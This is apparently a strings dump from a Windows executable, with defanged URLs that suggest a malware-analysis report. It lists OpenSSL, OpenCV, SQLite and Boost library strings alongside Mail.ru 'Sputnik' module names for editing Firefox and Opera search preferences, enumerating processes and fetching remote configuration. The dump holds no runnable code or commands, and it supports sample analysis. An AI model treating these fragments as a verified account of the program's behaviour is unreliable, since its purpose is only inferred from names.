id-PasswordBasedMAC
X509v3 Certificate Issuer
certificateIssuer
certicom-arc
Proxy Certificate Information
proxyCertInfo
Microsoft Smartcardlogin
msSmartcardLogin
joint-iso-itu-t
JOINT-ISO-ITU-T
set-rootKeyThumb
setAttr-Cert
setCext-cCertRequired
setCext-certType
setct-CertResTBE
setct-CertReqTBEX
setct-CertReqTBE
setct-AcqCardCodeMsgTBE
setct-CertInqReqTBS
setct-CertResData
setct-CertReqTBS
setct-CertReqData
setct-PCertResTBS
setct-PCertReqData
setct-AcqCardCodeMsg
certificate extensions
set-certExt
set-msgExt
id-ecPublicKey
id-cmc-confirmCertAcceptance
id-cmc-getCert
id-regInfo-certReq
id-regCtrl-protocolEncrKey
id-regCtrl-oldCertID
id-it-revPassphrase
id-it-keyPairParamRep
id-it-keyPairParamReq
id-it-unsupportedOIDs
id-it-caKeyUpdateInfo
id-it-encKeyPairTypes
id-it-signKeyPairTypes
id-it-caProtEncCert
id-mod-attribute-cert
id-mod-qualified-cert-93
id-mod-qualified-cert-88
id-smime-aa-ets-certCRLTimestamp
id-smime-aa-ets-certValues
id-smime-aa-ets-CertificateRefs
id-smime-aa-ets-otherSigCert
id-smime-aa-smimeEncryptCerts
id-smime-aa-signingCertificate
id-smime-aa-encrypKeyPref
id-smime-aa-msgSigDigest
id-smime-ct-publishCert
id-smime-mod-msg-v3
sdsiCertificate
x509Certificate
localKeyID
certBag
pkcs8ShroudedKeyBag
keyBag
pbeWithSHA1And2-KeyTripleDES-CBC
pbeWithSHA1And3-KeyTripleDES-CBC
TLS Web Client Authentication
TLS Web Server Authentication
X509v3 Extended Key Usage
extendedKeyUsage
X509v3 Authority Key Identifier
authorityKeyIdentifier
X509v3 Certificate Policies
certificatePolicies
X509v3 Private Key Usage Period
privateKeyUsagePeriod
X509v3 Key Usage
keyUsage
X509v3 Subject Key Identifier
subjectKeyIdentifier
Netscape Certificate Sequence
nsCertSequence
Netscape CA Policy Url
nsCaPolicyUrl
Netscape Renewal Url
nsRenewalUrl
Netscape CA Revocation Url
nsCaRevocationUrl
Netscape Revocation Url
nsRevocationUrl
Netscape Base Url
nsBaseUrl
Netscape Cert Type
nsCertType
Netscape Certificate Extension
nsCertExt
extendedCertificateAttributes
challengePassword
dhKeyAgreement
passed a null parameter
DSO support routines
x509 certificate routines
error:lX:%s:%s:%s
Stack part of OpenSSL 1.0.0g 18 Jan 2012
Big Number part of OpenSSL 1.0.0g 18 Jan 2012
lhash part of OpenSSL 1.0.0g 18 Jan 2012
ASN.1 part of OpenSSL 1.0.0g 18 Jan 2012
hexkey
rsa_keygen_pubexp
rsa_keygen_bits
RAND part of OpenSSL 1.0.0g 18 Jan 2012
You need to read the OpenSSL FAQ, hXXp://VVV.openssl.org/support/faq.html
keylen <= sizeof key
EVP_CIPHER_key_length(cipher) <= (int)sizeof(md_tmp)
%d.%d.%d.%d
EC part of OpenSSL 1.0.0g 18 Jan 2012
ECDSA part of OpenSSL 1.0.0g 18 Jan 2012
.\crypto\ec\ec_key.c
DSA part of OpenSSL 1.0.0g 18 Jan 2012
Diffie-Hellman part of OpenSSL 1.0.0g 18 Jan 2012
.\crypto\dh\dh_key.c
value.single
value.set
USER32.DLL
NETAPI32.DLL
ADVAPI32.DLL
keylength
keyfunc
EVP part of OpenSSL 1.0.0g 18 Jan 2012
.\crypto\pkcs12\p12_key.c
d.registeredID
d.iPAddress
d.uniformResourceIdentifier
d.ediPartyName
d.directoryName
d.dNSName
d.rfc822Name
d.otherName
ECDH part of OpenSSL 1.0.0g 18 Jan 2012
priv_key
pub_key
%'%1$=%C%K%O%s%
.%.-.3.7.9.?.W.[.o.y.
C%C'C3C7C9COCWCiC
%s: (%d bit)
Public-Key
Private-Key
recommended-private-length: %d bits
public-key:
private-key:
PKCS#3 DH Public-Key
PKCS#3 DH Private-Key
Public-Key: (%d bit)
Private-Key: (%d bit)
<unsupported>
IP Address:%d.%d.%d.%d
URI:%s
DNS:%s
email:%s
EdiPartyName:<unsupported>
X400Name:<unsupported>
othername:<unsupported>
/usr/local/ssl/certs
/usr/local/ssl/cert.pem
SSL_CERT_DIR
SSL_CERT_FILE
CONF part of OpenSSL 1.0.0g 18 Jan 2012
X509_PUBKEY
public_key
.\crypto\asn1\x_pubkey.c
name.relativename
name.fullname
certificateHold
Certificate Hold
cessationOfOperation
Cessation Of Operation
keyCompromise
Key Compromise
%*s%s:
%*sOnly Attribute Certificates
%*sOnly CA Certificates
%*sOnly User Certificates
%d.%d.%d.%d/%d.%d.%d.%d
%*sPolicy Text: %s
%*scrlUrl:
EXTENDED_KEY_USAGE
%*sZone: %s, User:
keyid
.\crypto\x509v3\v3_akey.c
d.usernotice
d.cpsuri
d.other
CERTIFICATEPOLICIES
%*sExplicit Text: %s
%*sNumber%s:
%*sOrganization: %s
%*sCPS: %s
PKEY_USAGE_PERIOD
keyCertSign
Certificate Sign
keyAgreement
Key Agreement
keyEncipherment
Key Encipherment
.\crypto\x509v3\v3_skey.c
pubkey
EC_PRIVATEKEY
publicKey
privateKey
value.implicitlyCA
value.parameters
value.named_curve
p.char_two
p.prime
p.ppBasis
p.tpBasis
p.onBasis
p.other
PKCS8_PRIV_KEY_INFO
pkey
pkeyalg
x%s
Basis Type: %s
Field Type: %s
ASN1 OID: %s
%s %s%lu (%s0x%lx)
value.bag
value.safes
value.shkeybag
value.keybag
value.sdsicert
value.x509cert
value.other
cert_info
\X
'() ,-./:=?
CONF_def part of OpenSSL 1.0.0g 18 Jan 2012
[[%s]]
[%s] %s=%s
MD5 part of OpenSSL 1.0.0g 18 Jan 2012
PROXY_CERT_INFO_EXTENSION
crlUrl
certStatus
certId
OCSP_CERTSTATUS
value.unknown
value.revoked
value.good
value.byKey
value.byName
reqCert
OCSP_CERTID
issuerKeyHash
certs
%s - d:d:d%.*s %d%s
AUTHORITY_KEYID
enc_key
key_enc_algor
cert
d.encrypted
d.digest
d.signed_and_enveloped
d.enveloped
d.sign
d.data
.\crypto\evp\evp_pkey.c
d.receiptList
d.allOrFirstTier
d.compressedData
d.authenticatedData
d.encryptedData
d.digestedData
d.envelopedData
d.signedData
d.ori
d.pwri
d.kekri
d.kari
d.ktri
CMS_PasswordRecipientInfo
keyDerivationAlgorithm
keyIdentifier
CMS_KeyAgreeRecipientInfo
recipientEncryptedKeys
CMS_OriginatorIdentifierOrKey
d.originatorKey
CMS_OriginatorPublicKey
CMS_RecipientEncryptedKey
CMS_KeyAgreeRecipientIdentifier
d.rKeyId
CMS_RecipientKeyIdentifier
CMS_OtherKeyAttribute
keyAttr
keyAttrId
CMS_KeyTransRecipientInfo
encryptedKey
keyEncryptionAlgorithm
certificates
d.crl
d.subjectKeyIdentifier
d.issuerAndSerialNumber
CMS_CertificateChoices
d.v2AttrCert
d.v1AttrCert
d.extendedCertificate
d.certificate
CMS_OtherCertificateFormat
otherCert
otherCertFormat
X.509 part of OpenSSL 1.0.0g 18 Jan 2012
OPENSSL_ALLOW_PROXY_CERTS
X509_CERT_PAIR
X509_CERT_AUX
%s.dll
%lu:%s:%s:%d:%s
ddddddZ
ddddddZ
PEM part of OpenSSL 1.0.0g 18 Jan 2012
phrase is too short, needs to be at least %d chars
Enter PEM pass phrase:
TRUSTED CERTIFICATE
CERTIFICATE REQUEST
NEW CERTIFICATE REQUEST
CERTIFICATE
X509 CERTIFICATE
PRIVATE KEY
ENCRYPTED PRIVATE KEY
ANY PRIVATE KEY
.\crypto\evp\evp_key.c
nkey <= EVP_MAX_KEY_LENGTH
?456789:;<=
!"#$%&'()* ,-./0123
Verifying - %s
D:\Libs\opencv\sources\modules\core\include\opencv2/core/mat.inl.hpp
D:\Libs\opencv\sources\modules\imgproc\src\templmatch.cpp
img.dims <= 2 && templ.dims <= 2 && corr.dims <= 2
corrsize.height <= img.rows   templ.rows - 1 && corrsize.width <= img.cols   templ.cols - 1
(depth == CV_8U || depth == CV_32F) && type == _templ.type() && _img.dims() <= 2
_img.size().height <= _templ.size().height && _img.size().width <= _templ.size().width
D:\Libs\opencv\sources\modules\imgproc\src\sumpixels.cpp
D:\Libs\opencv\sources\modules\core\src\alloc.cpp
D:\Libs\opencv\sources\modules\core\src\matrix.cpp
m.dims >= 2
0 <= _rowRange.start && _rowRange.start <= _rowRange.end && _rowRange.end <= m.rows
0 <= _colRange.start && _colRange.start <= _colRange.end && _colRange.end <= m.cols
m.dims <= 2
0 <= roi.x && 0 <= roi.width && roi.x   roi.width <= m.cols && 0 <= roi.y && 0 <= roi.height && roi.y   roi.height <= m.rows
r == Range::all() || (0 <= r.start && r.start < r.end && r.end <= m.size[i])
COI is not supported by the function
0 <= i && i < (int)vv.size()
0 <= i && i < (int)v.size()
Unknown/unsupported array type
i < (int)vv.size()
(size_t)i < vv.size()
!fixedSize() || ((Mat*)obj)->size.operator()() == _sz
!fixedSize() || ((UMat*)obj)->size.operator()() == _sz
!fixedSize() || ((Mat*)obj)->size.operator()() == Size(_cols, _rows)
!fixedSize() || ((UMat*)obj)->size.operator()() == Size(_cols, _rows)
CV_MAT_TYPE(mtype) == m.type()
m.dims == d
m.size[j] == sizes[j]
d == 2 && ((sizes[0] == sz.height && sizes[1] == sz.width) || (allowTransposed && sizes[0] == sz.width && sizes[1] == sz.height))
!fixedSize() || len == vv.size()
Vectors with element size %d are not supported. Please, modify OutputArray::create()
v[j].empty()
i < (int)v.size()
checkScalar(value, type(), arr.kind(), _InputArray::CUDA_GPU_MAT)
_m.dims() <= 2
_src.dims() <= 2 && esz <= 32
src.size() == dst.size() && (src.cols == 1 || src.rows == 1)
dst.cols == dst.rows
m.dims <= 2 && m.rows == m.cols
_src.dims() <= 2
A.size == arrays[i0]->size
A.step[d-1] == A.elemSize()
%s:%d: error: (%d) %s in function %s
%s:%d: error: (%d) %s
OpenCV Error: %s (%s) in %s, file %s, line %d
Inplace operation is not supported
Input image depth is not supported by function
Unsupported format or combination of formats
Input COI is not supported
No CUDA support
No OpenGL support
Unknown %s code %d
D:\Libs\opencv\sources\modules\core\src\system.cpp
tlsKey != TLS_OUT_OF_INDEXES
cv::TLSContainerStorage::releaseKey
key_ >= 0
D:\Libs\opencv\sources\modules\core\src\convert.cpp
j < nsrcs && src[j].depth() == depth
i1 >= 0 && j < ndsts && dst[j].depth() == depth
D:\Libs\opencv\sources\modules\core\src\copy.cpp
mask.depth() == CV_8U && (mcn == 1 || mcn == cn)
size() == mask.size()
checkScalar(value, type(), _value.kind(), _InputArray::MAT )
mask.empty() || (mask.type() == CV_8U && size == mask.size)
Unknown/unsupported border type
src.depth() == dst.depth() && src.size == dst.size
(coi1 != 0 || src.channels() == 1) && (coi2 != 0 || dst.channels() == 1)
src.channels() == dst.channels()
D:\Libs\opencv\sources\modules\core\src\matop.cpp
CV_MAT_CN(_type) == e.a.channels()
Unknown operation
D:\Libs\opencv\sources\modules\core\src\arithm.cpp
The operation is neither 'array op array' (where arrays have the same size and type), nor 'array op scalar', nor 'scalar op array'
(mtype == CV_8U || mtype == CV_8S) && _mask.sameSize(*psrc1)
The operation is neither 'array op array' (where arrays have the same size and the same number of channels), nor 'array op scalar', nor 'scalar op array'
type2 == CV_64F && (sz2.height == 1 || sz2.height == 4)
(mtype == CV_8UC1 || mtype == CV_8SC1) && _mask.sameSize(*psrc1)
The operation is neither 'array op array' (where arrays have the same size and the same type), nor 'array op scalar', nor 'scalar op array'
D:\Libs\opencv\sources\modules\core\src\stat.cpp
mask.empty() || mask.type() == CV_8U
mask.empty() || mask.type() == CV_8UC1
dst.type() == CV_64F && dst.isContinuous() && (dst.cols == 1 || dst.rows == 1) && dcn >= cn
D:\Libs\opencv\sources\modules\core\src\mathfuncs.cpp
!)>D:\Libs\opencv\sources\modules\core\src\dxt.cpp
type == srcB.type() && srcA.size() == srcB.size()
D:\Libs\opencv\sources\modules\core\src\umatrix.cpp
D:\Libs\opencv\sources\modules\core\src\array.cpp
_dst.data == data0
NULL array pointer is passed
Unrecognized or unsupported array type
unrecognized or unsupported array type
Only continuous nD arrays are supported here
Unsupported format
rect.width >= 0 && rect.height >= 0 && rect.x < image->width && rect.y < image->height && rect.x   rect.width >= (int)(rect.width > 0) && rect.y   rect.height >= (int)(rect.height > 0)
D:\Libs\opencv\sources\modules\core\src\datastructs.cpp
D:\Libs\opencv\sources\modules\core\include\opencv2/core/private.cuda.hpp
The library is compiled without CUDA support
D:\Libs\opencv\sources\modules\core\src\opengl.cpp
The library is compiled without OpenGL support
OpenCL.dll
D:\Libs\opencv\sources\modules\core\src\matmul.cpp
type == B.type() && (type == CV_32FC1 || type == CV_64FC1 || type == CV_32FC2 || type == CV_64FC2)
a_size.width == len
a_size.height == len
C.type() == type && (((flags&GEMM_3_T) == 0 && C.rows == d_size.height && C.cols == d_size.width) || ((flags&GEMM_3_T) != 0 && C.rows == d_size.width && C.cols == d_size.height))
type == _src2.type()
src1.size == src2.size
src.channels() == 1
delta.channels() == 1 && (delta.rows == src.rows || delta.rows == 1) && (delta.cols == src.cols || delta.cols == 1)
D:\Libs\opencv\sources\modules\core\src\lapack.cpp
type == _src2.type() && (type == CV_32F || type == CV_64F)
(method != DECOMP_LU && method != DECOMP_CHOLESKY) || is_normal || src.rows == src.cols
src.rows == src.cols
w.type() == u.type() && u.type() == vt.type() && u.data && vt.data && w.data
u.cols >= nm && vt.rows >= nm && (w.size() == Size(nm, 1) || w.size() == Size(1, nm) || w.size() == Size(vt.rows, u.cols))
rhs.data == 0 || (rhs.type() == type && rhs.rows == m)
D:\Libs\opencv\sources\modules\core\src\persistence.cpp
-.Inf
An attempt to add element without a key to a map, or add element with key to sequence
The key is an empty
The key is too long
Key must start with a letter or _
Key names may only contain alphanumeric characters [a-zA-Z0-9], '-', '_' and ' '
Key should start with a letter or _
Key name may only contain alphanumeric characters [a-zA-Z0-9], '-' and '_'
elements with keys can not be written to sequence
Images with planar data layout are not supported
2if%s
ß%s
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
0123456789-
%b %d %H : %M : %S %Y
%m / %d / %y
%I : %M : %S %p
%d / %m / %y
The repeat operator "*" cannot start a regular expression.
The repeat operator "?" cannot start a regular expression.
The repeat operator " " cannot start a regular expression.
Found a closing repetition operator } with no corresponding {.
Can't terminate a sub-expression with an alternation operator |.
The \c and \C escape sequences are not supported by POSIX basic regular expressions: try the Perl syntax instead.
A regular expression can start with the alternation operator |.
Invalid alternation operators within (?...) block.
More than one alternation operator | was encountered inside a conditional expression.
Alternation operators are not allowed inside a DEFINE block.
A repetition operator cannot be applied to a zero-width assertion.
left-curly-bracket
right-curly-bracket
0123456789
Unmatched quantified repeat operator { or \{.
Invalid preceding regular expression prior to repetition operator.
boost::filesystem::directory_iterator::operator  
boost thread: trying joining itself
Local\{C15730E2-145C-4c5e-B005-3BC753F42475}-once-flag
libs\log\src\code_conversion.cpp
libs\log\src\global_logger_storage.cpp
libs\log\src\attribute_name.cpp
[u-u-u u:u:u.u] [%s] %s %s
[u-u-u u:u:u.u] [%s] %s %ls
libs\log\src\thread_specific.cpp
Resource.cpp
%Y-%m-%d %H:%M:%S
en_US.UTF-8
log_ng.cpp
mailru::log_ng::ExecutionTimeLogger::~ExecutionTimeLogger
is_admin.cpp
c:\desktop_apps\sputniklib\auto_handle.hpp
process_enumerate.cpp
GetModuleFileNameEx succeed %s
Path.cpp
remote_config.cpp
string.cpp
version_info.cpp
AccountInfo.cpp
mailru::sqlite::database::database
sqlite.cpp
<>"#%{}|\^~[] ?&@=:,
hXXp://
hXXps://
process_util.cpp
unzip.cpp
filesystem_utils.cpp
mailru::firefox_js_core::load_prefs_js
firefox_js.cpp
!"#$%&'(
)* ,-./0123
encryption.cpp
testing_env.cpp
SessionsInfo.cpp
mailru::WaitForUserLogIn
Suggest URL
mailru::opera::searchini::save
opera_searchini.cpp
sync_objects.cpp
uninstall_manager.cpp
mailru::url_parser::init
url_parser.cpp
system_info\system_info_collector.cpp
crash_handler.cpp
shortcut.cpp
thread.entry_event
thread.exit_event
mailru::http::request_headers::get_header
C:\desktop_apps\SputnikLib/http_downloader.h
HTTP/1.1
^HTTP/1.1 (\d ) (. )
mailru::http::response_headers::response_headers
mailru::http::response_headers::get_file_time
http_downloader.cpp
mailru::http::downloader_impl::connection_data_file::~connection_data_file
mailru::http::downloader_impl::handle_read_headers
mailru::http::raw::downloader::fetch_file_attributes
HTTP error %2%: %3%
mailru::http::fetch_wstring_via_tempfile
system_info\system_info.cpp
s-sputnik.mail.ru
hXXps://VVV.geotrust.com/resources/root_certificates/certificates/Equifax_Secure_Certificate_Authority.pem
-----BEGIN CERTIFICATE-----
-----END CERTIFICATE-----
255.255.255.255
asio.ssl
asio.ssl error
add_certificate_authority
https
HTTP error:
caching_policy.cpp
task_scheduler.cpp
Line %d, Column %d
Visual C   CRT: Not enough memory to complete call to strerror.
%S#[k
?#%X.y
MaxPolicyElementKey
Operation not permitted
Inappropriate I/O control operation
Broken pipe
operator
GetProcessWindowStation
pExecutionResource
SQLite format 3
3.7.11
REINDEXEDESCAPEACHECKEYBEFOREIGNOREGEXPLAINSTEADDATABASELECTABLEFTHENDEFERRABLELSEXCEPTRANSACTIONATURALTERAISEXCLUSIVEXISTSAVEPOINTERSECTRIGGEREFERENCESCONSTRAINTOFFSETEMPORARYUNIQUERYATTACHAVINGROUPDATEBEGINNERELEASEBETWEENOTNULLIKECASCADELETECASECOLLATECREATECURRENT_DATEDETACHIMMEDIATEJOINSERTMATCHPLANALYZEPRAGMABORTVALUESVIRTUALIMITWHENWHERENAMEAFTEREPLACEANDEFAULTAUTOINCREMENTCASTCOLUMNCOMMITCONFLICTCROSSCURRENT_TIMESTAMPRIMARYDEFERREDISTINCTDROPFAILFROMFULLGLOBYIFISNULLORDERESTRICTOUTERIGHTROLLBACKROWUNIONUSINGVACUUMVIEWINITIALLY
CREATE TABLE sqlite_master(
sql text
CREATE TEMP TABLE sqlite_temp_master(
foreign_keys
sqlite_rename_table
sqlite_rename_trigger
sqlite_rename_parent
sqlite_stat1
SQL logic error or missing database
unknown operation
large file support is disabled
RowKey
sqlite_detach
sqlite_attach
sqlite_version
sqlite_source_id
sqlite_log
sqlite_compileoption_used
sqlite_compileoption_get
SQLITE_
d-d-d d:d:d
d:d:d
d-d-d
failed to allocate %u bytes of memory
failed memory resize %u to %u bytes
922337203685477580
API call with %s database connection pointer
OsError 0x%x (%u)
os_win.c:%d: (%d) %s(%s) - %s
delayed %dms for lock/sharing conflict
%s-shm
%s\etilqs_
Recovered %d frames from WAL file %s
cannot limit WAL size: %s
invalid page number %d
2nd reference to page %d
Failed to read ptrmap key=%d
Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d)
%d of %d pages missing from overflow list starting at %d
failed to get page %d
freelist leaf count too big on page %d
Page %d:
unable to get the page. error code=%d
btreeInitPage() returns error code %d
On tree page %d cell %d:
On page %d at right child:
Corruption detected in cell %d on page %d
Multiple uses for byte %d of page %d
Fragmentation of %d bytes reported as %d on page %d
Page %d is never used
Pointer map page %d is referenced
Outstanding page count goes from %d to %d during this analysis
unknown database %s
keyinfo(%d
%s(%d)
%s-mjXXXXXX9XXz
MJ delete: %s
MJ collide: %s
-mjX9X
foreign key constraint failed
unable to use function %s in the requested context
bind on a busy prepared statement: [%s]
zeroblob(%d)
abort at %d in [%s]: %s
constraint failed at %d in [%s]
cannot open savepoint - SQL statements in progress
no such savepoint: %s
cannot release savepoint - SQL statements in progress
cannot commit transaction - SQL statements in progress
sqlite_temp_master
sqlite_master
SELECT name, rootpage, sql FROM '%q'.%s WHERE %s ORDER BY rowid
cannot change %s wal mode from within a transaction
database table is locked: %s
statement aborts at %d: [%s] %s
cannot open value of type %s
cannot open virtual table: %s
cannot open view: %s
no such column: "%s"
foreign key
indexed
cannot open %s column for writing
misuse of aliased aggregate %s
%s: %s.%s.%s
%s: %s.%s
%s: %s
not authorized to use function: %s
%r %s BY term out of range - should be between 1 and %d
too many terms in %s BY clause
Expression tree is too large (maximum depth %d)
variable number must be between ?1 and ?%d
too many SQL variables
too many columns in %s
EXECUTE %s%s SUBQUERY %d
misuse of aggregate: %s()
%.*s"%w"%s
%s%.*s"%w"
%s OR name=%Q
type='trigger' AND (%s)
sqlite_
table %s may not be altered
there is already another table or index with this name: %s
view %s may not be altered
UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d 18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
sqlite_sequence
UPDATE "%w".sqlite_sequence set name = %Q WHERE name = %Q
UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Cannot add a PRIMARY KEY column
UPDATE "%w".%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr(sql,%d) WHERE type = 'table' AND name = %Q
sqlite_altertab_%s
CREATE TABLE %Q.%s(%s)
DELETE FROM %Q.%s WHERE %s=%Q
SELECT tbl,idx,stat FROM %Q.sqlite_stat1
invalid name: "%s"
too many attached databases - max %d
database %s is already in use
unable to open database: %s
no such database: %s
cannot detach database %s
database %s is locked
%s %T cannot reference objects in database %s
access to %s.%s.%s is prohibited
access to %s.%s is prohibited
object name reserved for internal use: %s
there is already an index named %s
too many columns on %s
duplicate column name: %s
default value of column [%s] is not constant
table "%s" has more than one primary key
AUTOINCREMENT is only allowed on an INTEGER PRIMARY KEY
no such collation sequence: %s
CREATE %s %.*s
UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d
CREATE TABLE %Q.sqlite_sequence(name,seq)
view %s is circularly defined
UPDATE %Q.%s SET rootpage=%d WHERE #%d AND rootpage=#%d
sqlite_stat%d
DELETE FROM %Q.sqlite_sequence WHERE name=%Q
DELETE FROM %Q.%s WHERE tbl_name=%Q and type!='trigger'
sqlite_stat
table %s may not be dropped
use DROP TABLE to delete table %s
use DROP VIEW to delete view %s
foreign key on %s should reference only one column of table %T
number of columns in foreign key does not match the number of columns in the referenced table
unknown column "%s" in foreign key definition
indexed columns are not unique
table %s may not be indexed
views may not be indexed
virtual tables may not be indexed
there is already a table named %s
index %s already exists
sqlite_autoindex_%s_%d
table %s has no column named %s
CREATE%s INDEX %.*s
INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
no such index: %S
index associated with UNIQUE or PRIMARY KEY constraint cannot be dropped
DELETE FROM %Q.%s WHERE name=%Q AND type='index'
a JOIN clause is required before %s
unable to identify the object to be reindexed
table %s may not be modified
cannot modify %s because it is a view
foreign key mismatch
table %S has %d columns but %d values were supplied
%d values for %d columns
table %S has no column named %s
%s.%s may not be NULL
PRIMARY KEY must be unique
sqlite3_extension_init
unable to open shared library [%s]
no entry point [%s] in shared library [%s]
error during initialization: %s
automatic extension loading failed: %s
foreign_key_list
*** in database %s ***
unsupported encoding: %s
malformed database schema (%s)
%s - %s
unsupported file format
SELECT name, rootpage, sql FROM '%q'.%s ORDER BY rowid
database schema is locked: %s
unknown or unsupported join type: %T %T%s%T
RIGHT and FULL OUTER JOINs are not currently supported
a NATURAL join may not have an ON or USING clause
cannot have both ON and USING clauses in the same join
cannot join using column %s - column not present in both tables
USE TEMP B-TREE FOR %s
COMPOUND SUBQUERIES %d AND %d %s(%s)
%s.%s
%s:%d
ORDER BY clause should come after %s not before
LIMIT clause should come after %s not before
SELECTs to the left and right of %s do not have the same number of result columns
no such index: %s
sqlite_subquery_%p_
no such table: %s
SCAN TABLE %s %s%s(~%d rows)
sqlite3_get_table() called with two or more incompatible queries
cannot create %s trigger on view: %S
cannot create INSTEAD OF trigger on table: %S
INSERT INTO %Q.%s VALUES('trigger',%Q,%Q,0,'CREATE TRIGGER %q')
no such trigger: %S
-- TRIGGER %s
no such column: %s
cannot VACUUM - SQL statements in progress
PRAGMA vacuum_db.synchronous=OFF
SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND rootpage>0
SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %'
SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)
UPDATE %Q.%s SET type='table', name=%Q, tbl_name=%Q, rootpage=0, sql=%Q WHERE rowid=#%d
vtable constructor failed: %s
vtable constructor did not declare schema: %s
no such module: %s
table %s: xBestIndex returned an invalid plan
%s SUBQUERY %d
%s TABLE %s
%s AS %s
%s USING %s%sINDEX%s%s%s
%s USING INTEGER PRIMARY KEY
%s (rowid=?)
%s (rowid>? AND rowid<?)
%s (rowid>?)
%s (rowid<?)
%s VIRTUAL TABLE INDEX %d:%s
%s (~%lld rows)
at most %d tables in a join
cannot use index: %s
the INDEXED BY clause is not allowed on UPDATE or DELETE statements within triggers
the NOT INDEXED clause is not allowed on UPDATE or DELETE statements within triggers
unable to close due to unfinished backup operation
unknown database: %s
no such %s mode: %s
%s mode not allowed: %s
no such vfs: %s
database corruption at line %d of [%.10s]
misuse at line %d of [%.10s]
cannot open file at line %d of [%.10s]
c:\desktop_apps\3party\ticpp\ticpp.h
ticpp.cpp
Type is unsupported
&#xX;
</%s>
%s="%s"
%s='%s'
<!--%s-->
<![CDATA[%s]]>
version="%s"
encoding="%s"
standalone="%s"
type="%s"
href="%s"
unsupported version
.UTF-8
.windows-
windows1250
windows1251
windows1252
windows1253
windows1254
windows1255
windows1256
windows1257
windows874
windows932
windows936
Invalid or unsupported charset:
1.2.5
<fd:%d>
deflate 1.2.5 Copyright 1995-2010 Jean-loup Gailly and Mark Adler
inflate 1.2.5 Copyright 1995-2010 Mark Adler
RSA PRIVATE KEY
PUBLIC KEY
DSA PRIVATE KEY
EC PRIVATE KEY
NETSCAPE_CERT_SEQUENCE
RIPE-MD160 part of OpenSSL 1.0.0g 18 Jan 2012
SHA part of OpenSSL 1.0.0g 18 Jan 2012
MD4 part of OpenSSL 1.0.0g 18 Jan 2012
CAST part of OpenSSL 1.0.0g 18 Jan 2012
Blowfish part of OpenSSL 1.0.0g 18 Jan 2012
:RC2 part of OpenSSL 1.0.0g 18 Jan 2012
.pp@0
aEÐ
 (#EÚ
ÚE<<0
IDEA part of OpenSSL 1.0.0g 18 Jan 2012
libdes part of OpenSSL 1.0.0g 18 Jan 2012
DES part of OpenSSL 1.0.0g 18 Jan 2012
3OpenSSL 1.0.0g 18 Jan 2012
GOST signature length is %d
.\ssl\ssl_cert.c
%-23s %s Kx=%-8s Au=%-4s Enc=%-9s Mac=%-4s%s
EXPORT56
EXPORT40
EXPORT
wrong number of key bits
unsupported status type
unsupported ssl version
unsupported protocol
unsupported elliptic curve
unsupported digest type
unsupported compression algorithm
unsupported cipher
unknown pkey type
unknown key exchange type
unknown certificate type
unable to find public key parameters
unable to extract public key
unable to decode ecdh certs
unable to decode dh certs
tried to use unsupported cipher
tls peer did not respond with certificate list
tls client cert req with anon cipher
tlsv1 unsupported extension
tlsv1 certificate unobtainable
tlsv1 bad certificate status response
tlsv1 bad certificate hash value
tlsv1 alert export restriction
sslv3 alert unsupported certificate
sslv3 alert no certificate
sslv3 alert certificate unknown
sslv3 alert certificate revoked
sslv3 alert certificate expired
sslv3 alert bad certificate
signature for non signing certificate
reuse cert type not zero
reuse cert length not zero
public key not rsa
public key is not rsa
public key encrypt error
peer error unsupported certificate type
peer error no certificate
peer error certificate
peer did not return a certificate
null ssl method passed
no publickey
no private key assigned
no privatekey
Peer haven't sent GOST certificate, required for selected ciphersuite
no client cert received
no client cert method
no ciphers passed
no certificate specified
no certificate set
no certificate returned
no certificate assigned
no certificates returned
missing tmp rsa pkey
missing tmp rsa key
missing tmp ecdh key
missing tmp dh key
missing rsa signing cert
missing rsa encrypting cert
missing rsa certificate
missing export tmp rsa key
missing export tmp dh key
missing dsa signing cert
missing dh rsa cert
missing dh key
missing dh dsa cert
krb5 server rd_req (keytab perms?)
key arg too long
invalid ticket keys length
http request
https proxy request
error generating tmp rsa key
ecc cert should have sha1 signature
ecc cert should have rsa signature
ecc cert not for signing
ecc cert not for key agreement
cert length mismatch
certificate verify failed
bad ecc cert
bad dh pub key length
TLS1_SETUP_KEY_BLOCK
tls1_cert_verify_mac
SSL_VERIFY_CERT_CHAIN
SSL_use_RSAPrivateKey_file
SSL_use_RSAPrivateKey_ASN1
SSL_use_RSAPrivateKey
SSL_use_PrivateKey_file
SSL_use_PrivateKey_ASN1
SSL_use_PrivateKey
SSL_use_certificate_file
SSL_use_certificate_ASN1
SSL_use_certificate
SSL_SET_PKEY
